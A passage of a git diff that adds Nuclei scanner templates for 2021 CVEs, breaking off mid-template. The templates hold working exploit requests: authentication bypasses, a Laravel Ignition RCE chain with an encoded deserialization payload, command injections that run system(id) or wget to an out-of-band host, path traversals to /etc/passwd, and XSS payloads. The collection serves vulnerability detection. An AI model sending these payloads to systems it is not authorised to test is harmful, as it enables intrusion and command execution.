+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "jato.pageSession") && status_code==200'
diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml
new file mode 100644
index 0000000000..d58b0ba9b8
--- /dev/null
+++ b/cves/2021/CVE-2021-29203.yaml
@@ -0,0 +1,53 @@
+id: CVE-2021-29203
+info:
+ name: HPE Edgeline Infrastructure Manager v1.21 Authentication Bypass
+ author: madrobot
+ severity: critical
+ tags: hpe,cve,cve2021,bypass
+ description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
+ reference: |
+ - https://www.tenable.com/security/research/tra-2021-15
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-29203
+
+requests:
+ - raw:
+ - |
+ PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en
+ Accept: */*
+ Content-Length: 23
+ Content-Type: application/json
+ Connection: close
+
+ {"Password":"{{randstr}}"}
+
+ - |
+ POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en
+ Content-Length: 50
+ Content-Type: application/json
+ Connection: close
+
+ {"UserName":"Administrator","Password":"{{randstr}}"}
+
+ matchers-condition: and
+ matchers:
+
+ - type: status
+ status:
+ - 201
+
+ - type: word
+ condition: and
+ part: header
+ words:
+ - "X-Auth-Token"
+ - "PasswordReset"
+ - "Location"
+
+ - type: word
+ part: body
+ words:
+ - "Base.1.0.Created"
diff --git a/cves/2021/CVE-2021-29441.yaml b/cves/2021/CVE-2021-29441.yaml
new file mode 100644
index 0000000000..ac947cde4f
--- /dev/null
+++ b/cves/2021/CVE-2021-29441.yaml
@@ -0,0 +1,49 @@
+id: CVE-2021-29441
+
+info:
+ name: Nacos prior to 1.4.1 Authentication Bypass
+ description: |
+ This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.
+
+ In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)
+ Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that
+ enables Nacos servers to bypass this filter and therefore skip authentication checks.
+ This mechanism relies on the user-agent HTTP header so it can be easily spoofed.
+ This issue may allow any user to carry out any administrative tasks on the Nacos server.
+ author: dwisiswant0
+ severity: high
+ reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
+ tags: nacos,auth-bypass,cve,cve2021
+
+requests:
+ - raw:
+ - |
+ POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+
+ - |
+ POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ User-Agent: Nacos-Server
+
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_1 == 403"
+ - "status_code_2 == 200"
+ condition: and
+
+ - type: dsl
+ dsl:
+ - "contains(body_1, 'Forbidden')"
+ - "body_2 == 'true'"
+ condition: and
+
+ - type: word
+ words:
+ - "application/json"
+ part: header
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-29442.yaml b/cves/2021/CVE-2021-29442.yaml
new file mode 100644
index 0000000000..81a6d3fc5d
--- /dev/null
+++ b/cves/2021/CVE-2021-29442.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-29442
+
+info:
+ name: Nacos prior to 1.4.1 Missing Authentication Check
+ description: |
+ In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out.
+ While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users.
+ These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)
+ author: dwisiswant0
+ severity: high
+ reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
+ tags: nacos,auth-bypass,cve,cve2021
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "application/json"
+ part: header
+ - type: regex
+ regex:
+ - "\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""
+ part: body
diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml
new file mode 100644
index 0000000000..1182c01f6c
--- /dev/null
+++ b/cves/2021/CVE-2021-29484.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-29484
+
+info:
+ name: DOM XSS in Ghost CMS
+ author: rootxharsh,iamnoooob
+ description: Ghost is a Node.js CMS. An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site.
+ severity: medium
+ tags: cve,cve2021,xss,ghost
+ reference: |
+ - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-29484
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ghost/preview"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'XMLHttpRequest.prototype.open'
+ part: body
+
+ - type: word
+ words:
+ - 'text/html'
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-29622.yaml b/cves/2021/CVE-2021-29622.yaml
new file mode 100644
index 0000000000..ff5a0b4b8a
--- /dev/null
+++ b/cves/2021/CVE-2021-29622.yaml
@@ -0,0 +1,20 @@
+id: CVE-2021-29622
+
+info:
+ name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect
+ author: geeknik
+ description: In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint.
+ reference: https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
+ severity: medium
+ tags: cve,cve2021,prometheus,redirect
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/new/newhttp://example.com"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ part: header
diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml
new file mode 100644
index 0000000000..9f93b76ad6
--- /dev/null
+++ b/cves/2021/CVE-2021-30151.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-30151
+
+info:
+ name: CVE-2021-30151
+ author: DhiyaneshDk
+ severity: low
+ description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
+ reference: |
+ - https://github.com/mperham/sidekiq/issues/4852
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-30151
+ tags: cve,cve2021,xss,sidekiq
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"'
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "onmouseover=\"alert('nuclei')"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-3019.yaml b/cves/2021/CVE-2021-3019.yaml
index 03762eb81a..ffe945115e 100644
--- a/cves/2021/CVE-2021-3019.yaml
+++ b/cves/2021/CVE-2021-3019.yaml
@@ -4,8 +4,11 @@ info:
name: Lanproxy Directory Traversal
author: pikpikcu
severity: medium
- refrence: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019
- tags: cve,cve2021,lanproxy,traversal
+ description: ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.
+ reference: |
+ - https://github.com/ffay/lanproxy/commits/master
+ - https://github.com/maybe-why-not/lanproxy/issues/1
+ tags: cve,cve2021,lanproxy,lfi
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-30461.yaml b/cves/2021/CVE-2021-30461.yaml
new file mode 100644
index 0000000000..98d90910a3
--- /dev/null
+++ b/cves/2021/CVE-2021-30461.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-30461
+
+info:
+ name: VoipMonitor Pre-Auth-RCE
+ author: shifacyclewala,hackergautam
+ severity: critical
+ description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.
+ tags: cve,cve2021,rce,voipmonitor
+ reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
+
+requests:
+ - raw:
+ - |
+ POST /index.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Connection: close
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 35
+
+ SPOOLDIR=test".system(id)."&recheck=Recheck
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "uid="
+ - "gid="
+ - "groups="
+ - "VoIPmonitor installation"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-30497.yaml b/cves/2021/CVE-2021-30497.yaml
new file mode 100644
index 0000000000..0c94b9f41b
--- /dev/null
+++ b/cves/2021/CVE-2021-30497.yaml
@@ -0,0 +1,25 @@
+id: CVE-2021-30497
+
+info:
+ name: Ivanti Avalanche Directory Traversal
+ author: gy741
+ severity: high
+ description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder
+ reference: https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
+ tags: cve,cve2021,avalanche,traversal
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "for 16-bit app support"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-31249.yaml b/cves/2021/CVE-2021-31249.yaml
new file mode 100644
index 0000000000..64112f9e82
--- /dev/null
+++ b/cves/2021/CVE-2021-31249.yaml
@@ -0,0 +1,26 @@
+id: CVE-2021-31249
+
+info:
+ name: CHIYU TCP/IP Converter devices - CRLF injection
+ author: geeknik
+ description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components.
+ reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
+ severity: medium
+ tags: cve,cve2021,chiyu,crlf,iot
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 302
+ - type: word
+ part: header
+ words:
+ - "Location: setting.htm"
+ - ""
+ condition: and
diff --git a/cves/2021/CVE-2021-31250.yaml b/cves/2021/CVE-2021-31250.yaml
new file mode 100644
index 0000000000..f03536d032
--- /dev/null
+++ b/cves/2021/CVE-2021-31250.yaml
@@ -0,0 +1,28 @@
+id: CVE-2021-31250
+
+info:
+ name: CHIYU IoT XSS
+ author: geeknik
+ description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
+ reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
+ severity: medium
+ tags: cve,cve2021,chiyu,xss,iot
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"
+ headers:
+ Authorization: "Basic OmFkbWlu"
+
+ redirects: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "text/html"
+ - type: word
+ part: body
+ words:
+ - "\">"
diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml
new file mode 100644
index 0000000000..d504289755
--- /dev/null
+++ b/cves/2021/CVE-2021-3129.yaml
@@ -0,0 +1,99 @@
+id: CVE-2021-3129
+
+info:
+ name: Laravel <= v8.4.2 Debug Mode - Remote Code Execution
+ author: z3bd,pdteam
+ severity: critical
+ description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
+ reference: |
+ - https://www.ambionics.io/blog/laravel-debug-rce
+ - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
+ tags: cve,cve2021,laravel,rce
+
+requests:
+ - raw:
+ - |
+ POST /_ignition/execute-solution HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: deflate
+ Accept: application/json
+ Connection: close
+ Content-Length: 144
+ Content-Type: application/json
+
+ {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
+
+ - |
+ POST /_ignition/execute-solution HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: deflate
+ Accept: application/json
+ Connection: close
+ Content-Length: 144
+ Content-Type: application/json
+
+ {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
+
+ - |
+ POST /_ignition/execute-solution HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: deflate
+ Accept: application/json
+ Connection: close
+ Content-Length: 144
+ Content-Type: application/json
+
+ {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}}
+
+ - |
+ POST /_ignition/execute-solution HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: deflate
+ Accept: application/json
+ Connection: close
+ Content-Length: 144
+ Content-Type: application/json
+
+ {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}}
+
+ - |
+ POST /_ignition/execute-solution HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: deflate
+ Accept: application/json
+ Connection: close
+ Content-Length: 144
+ Content-Type: application/json
+
+ {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
+
+ - |
+ POST /_ignition/execute-solution HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: deflate
+ Accept: application/json
+ Connection: close
+ Content-Length: 144
+ Content-Type: application/json
+
+ {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 500
+
+ - type: word
+ words:
+ - "uid="
+ - "gid="
+ - "groups="
+ - "Illuminate"
+ part: body
+ condition: and
+
+ extractors:
+ - type: regex
+ regex:
+ - "(u|g)id=.*"
diff --git a/cves/2021/CVE-2021-31537.yaml b/cves/2021/CVE-2021-31537.yaml
new file mode 100644
index 0000000000..0e40527eea
--- /dev/null
+++ b/cves/2021/CVE-2021-31537.yaml
@@ -0,0 +1,28 @@
+id: CVE-2021-31537
+
+info:
+ name: SIS-REWE GO version 7.5.0/12C XSS
+ author: geeknik
+ description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).
+ reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/
+ severity: medium
+ tags: cve,cve2021,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "SIS-REWE"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
diff --git a/cves/2021/CVE-2021-31581.yaml b/cves/2021/CVE-2021-31581.yaml
new file mode 100644
index 0000000000..4239a6763e
--- /dev/null
+++ b/cves/2021/CVE-2021-31581.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-31581
+
+info:
+ name: Akkadian Provisioning Manager MariaDB Credentials
+ author: geeknik
+ reference:
+ - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/
+ - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/
+ severity: medium
+ tags: cve,cve2021,akkadian,mariadb,disclosure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pme/database/pme/phinx.yml"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "host:"
+ - "name:"
+ - "pass:"
+ condition: and
+
+ - type: word
+ words:
+ - "html>"
+ negative: true
diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml
new file mode 100644
index 0000000000..d1d4550b3f
--- /dev/null
+++ b/cves/2021/CVE-2021-31755.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-31755
+
+info:
+ name: Tenda Router AC11 RCE
+ description: Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+ author: gy741
+ severity: critical
+ reference: |
+ - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3
+ - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
+ tags: cve,cve2021,tenda,rce,oob
+
+requests:
+ - raw:
+ - |
+ POST /goform/setmac HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Origin: http://{{Hostname}}
+ Referer: http://{{Hostname}}/index.htmlr
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+ Content-Type: application/x-www-form-urlencoded
+
+ module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml
new file mode 100644
index 0000000000..d57e08a80c
--- /dev/null
+++ b/cves/2021/CVE-2021-3223.yaml
@@ -0,0 +1,29 @@
+id: CVE-2021-3223
+
+info:
+ name: Node RED Dashboard - Directory Traversal
+ author: gy741,pikpikcu
+ severity: high
+ description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files.
+ reference: |
+ - https://github.com/node-red/node-red-dashboard/issues/669
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
+ tags: cve,cve2020,node-red-dashboard,lfi
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
+ - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'
+
+ matchers-condition: or
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: word
+ part: body
+ words:
+ - "Node-RED web server is listening"
diff --git a/cves/2021/CVE-2021-32305.yaml b/cves/2021/CVE-2021-32305.yaml
new file mode 100644
index 0000000000..0326dec716
--- /dev/null
+++ b/cves/2021/CVE-2021-32305.yaml
@@ -0,0 +1,25 @@
+id: CVE-2021-32305
+
+info:
+ name: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
+ description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
+ author: gy741
+ severity: critical
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-32305
+ - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
+ tags: cve,cve2021,websvn,rce,oob
+
+requests:
+ - raw:
+ - |
+ GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml
new file mode 100644
index 0000000000..5dec02f97b
--- /dev/null
+++ b/cves/2021/CVE-2021-32820.yaml
@@ -0,0 +1,29 @@
+id: CVE-2021-32820
+
+info:
+ name: Express-handlebars Path Traversal
+ author: dhiyaneshDk
+ severity: medium
+ reference: |
+ - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
+ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
+ tags: cve,cve2021,expressjs,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?layout=/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - "daemon:[x*]:0:0:"
+ - "operator:[x*]:0:0:"
+ part: body
+ condition: or
diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml
new file mode 100644
index 0000000000..dd73110c6d
--- /dev/null
+++ b/cves/2021/CVE-2021-3297.yaml
@@ -0,0 +1,34 @@
+id: CVE-2021-3297
+info:
+ name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass
+ description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access.
+ author: gy741
+ severity: high
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-3297
+ - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
+ tags: cve,cve2021,zyxel,auth-bypass,router
+
+requests:
+ - raw:
+ - |
+ GET /status.htm HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: keep-alive
+ cookie: language=en; login=1
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Running Time"
+ - "Firmware Version"
+ - "Firmware Build Time"
+ condition: and
diff --git a/cves/2021/CVE-2021-33221.yaml b/cves/2021/CVE-2021-33221.yaml
new file mode 100644
index 0000000000..0426b0eee2
--- /dev/null
+++ b/cves/2021/CVE-2021-33221.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-33221
+
+info:
+ name: CommScope Ruckus IoT Controller Unauthenticated Service Details
+ author: geeknik
